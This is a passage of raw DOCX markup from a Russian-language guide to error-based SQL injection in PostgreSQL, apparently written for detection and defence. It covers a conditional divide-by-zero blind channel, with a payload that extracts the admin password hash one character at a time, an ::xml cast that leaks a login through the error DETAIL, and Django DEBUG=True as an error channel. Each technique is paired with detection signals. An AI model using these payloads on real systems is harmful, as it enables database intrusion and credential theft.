        <w:t xml:space="preserve"> и отрабатывает успешно → HTTP 200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Извлечение по одному символу через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ascii(substring(...))</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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT CASE WHEN ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) = 36 THEN 1/0 ELSE 1 END)</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CASE WHEN ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) = 36 THEN 1/0 ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Бинарный поиск ускоряет: вместо 128 запросов на символ хватает 7.</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извлекает данные побитово или посимвольно через различение кодов ответа. Канал медленный, но устойчивый: работает там, где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не работают из-за того, что приложение глотает текст ошибки и возвращает обобщённое 500.</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Деление целочисленных типов в PG при делителе 0 вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ereport(ERROR, errcode(ERRCODE_DIVISION_BY_ZERO), errmsg("division by zero"))</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int4div()</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в PG — short-circuit: ветка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ELSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не вычисляется, если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cond</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> истинно. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывает строго при истинном условии. Это даёт чистый бинарный канал поверх любой инъекции, где наблюдаем хотя бы факт ошибки.</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Канал доставки текста ошибки не требуется — достаточно различимости HTTP-status.</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Деление в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встречается, когда программисты защищаются от деления на ноль через явный guard: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASE WHEN denominator = 0 THEN NULL ELSE numerator/denominator END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это обратная конструкция — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN &lt;безопасное&gt;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ELSE &lt;деление&gt;</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Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">THEN 1/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или эквивалентные конструкции — деление на ноль никогда не пишут намеренно как «успешный» путь.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASE WHEN cond THEN &lt;ошибка&gt; ELSE &lt;норма&gt; END</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или скалярном контексте, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cond</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — подзапрос к user-data таблице.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pP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одна и та же форма запроса с разными литералами в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">substring(..., N, 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и разными константами для сравнения через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ascii(...) = K</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Корреляция HTTP 500 с одного клиента и одинаковым URL, отличающимся только query string.</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3.3, 3.4, 3.2.1.</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PortSwigger SQL injection cheat sheet — Conditional errors; HackTricks: PostgreSQL injection; PostgreSQL Documentation: Conditional Expressions — CASE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.4 XML-парсер: `::xml`</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PG-тип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имеет собственный парсер (libxml2). Cast к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от невалидного XML-фрагмента возвращает ошибку, в которую попадает часть исходного текста. Используется реже, чем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потому что менее предсказуем (зависит от libxml2-сборки), и потому что требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--with-libxml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при компиляции сервера.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тот же, что в 3.2.1.</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Через каст к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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT ('&lt;' || (SELECT login FROM users LIMIT 1) || '&gt;')::xml)</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('&lt;' || (SELECT login FROM users LIMIT 1) || '&gt;')::xml)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">login = 'admin user'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, сконструированный XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;admin user&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> некорректен (пробел в имени тега), и PG бросает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: invalid XML content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DETAIL: line 1: error parsing attribute name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;admin user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       ^</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В тексте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DETAIL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> присутствует фрагмент исходного XML.</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Канал работает, но не всегда: формат сообщения зависит от версии libxml2, не от PG. На некоторых сборках </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DETAIL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> усекается, на других не возвращается клиенту вообще.</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xml_in()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсит вход через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xmlReadMemory()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из libxml2. При ошибке парсинга libxml2 формирует структуру </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xmlError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, из которой PG копирует фрагмент в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DETAIL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ошибки.</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PostgreSQL, собранный с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--with-libxml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (стандартная сборка на большинстве дистрибутивов). Канал доставки ошибки с полем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DETAIL</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Cast к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встречается в приложениях, работающих с XML-данными — SOAP-интеграции, документообо́рот.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cast к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строки, собранной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из подзапроса. Легитимный код кастит уже валидный XML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;' || expr || '&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — индикатор намеренной попытки сломать парсер на пробельных или специальных символах.</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 со сборкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--with-libxml</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3.2.1, 3.11.3.</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HackTricks: PostgreSQL injection — XML based; PostgreSQL Documentation: XML Functions, Data Type — xml.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.5 Каналы пробрасывания ошибки до атакующего</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Все четыре предыдущих паттерна (3.2.1–3.2.4) бесполезны, если текст ошибки PG не доходит до атакующего. На сервере ошибка всегда генерируется и попадает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; вопрос — как и сколько из неё попадёт в HTTP-ответ. Этот подраздел не про SQL, а про конфигурацию приложения и фреймворков.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал 1: Django при `DEBUG=True`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># settings.py — уязвимая конфигурация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DEBUG = True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOWED_HOSTS = ['*']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DEBUG=True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> любой необработанный exception проходит через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
